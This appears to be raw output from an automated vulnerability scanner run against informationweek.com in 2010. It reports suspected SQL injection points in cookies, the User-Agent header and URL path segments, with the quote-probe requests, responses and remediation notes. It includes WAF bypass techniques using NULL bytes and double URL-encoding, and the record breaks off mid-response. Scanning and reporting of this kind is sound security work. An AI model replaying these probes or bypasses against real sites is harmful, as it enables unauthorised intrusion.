Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333'; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333''; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv_s cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv_s cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00';
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 174152
<html><head><!-- <meta http-equiv="refresh" content="300;url=?cid=ref-true"> --><title>InformationWeek's Wolfe's Den Weblog</title><META NAME="y_key" CONTENT="15bba51c08c024d1"><META NAME="robot ...[SNIP]... <p>Former counter-terrorism advisor Richard Clarke has a new book out, and it's scary stuff for all of us concerned about the national security of the United States. Scarier still, the alarms sounded by the book -- "Cyber War ...[SNIP]...
Request 2
GET /blog/main/archives/wolfes_den/index.html HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days%00'';
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/blog/main/archives/wolfes_den/index.html&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:19:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... </strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong> ...[SNIP]...
Request 2
GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:19:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /newsletters'/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29746
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /newsletters''/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/newsletters''/DR_subscribe.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security'/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30117
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security''/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security''/&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the iwkbtn_emc_101111 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:18 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:18 GMT
